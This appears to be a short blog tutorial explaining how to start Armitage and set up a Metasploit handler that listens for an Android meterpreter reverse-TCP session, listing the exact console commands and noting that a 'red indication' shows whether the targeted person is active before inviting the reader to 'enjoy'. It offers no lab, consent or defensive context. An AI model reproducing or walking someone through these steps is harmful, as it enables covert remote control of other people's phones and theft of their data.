creating an android payload listener in metasploit using armitage .

Image result for armitage

  1. open the terminal in root (type “su” in the terminal and the root password)
  2. now type “armitage”.(or click on the armitage gui icon)
  3. Screenshot from 2018-06-26 21-51-48
  4. click on connect.
  5. Screenshot from 2018-06-26 21-52-04
  6. click on yes
  7. then the gui start automatically
  8. Screenshot from 2018-06-26 21-52-27
  9. Screenshot from 2018-06-26 21-55-11
  1. use  exploit/multi/handler
  2. set PAYLOAD android/meterpreter/reverse_tcp
  3. set LHOST <space> ipadress(lhost)
  4. set LPORT <space> port no u typed while creating  a payload
  5. exploit

if host is up it will show a monitor window with red indication (red indication show whether person is active or not)

click on it and open it in anather terminal

type help for possible cammands and enjoy

if u have any dout comment…

 

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create a website or blog at WordPress.com

Up ↑

Design a site like this with WordPress.com
Get started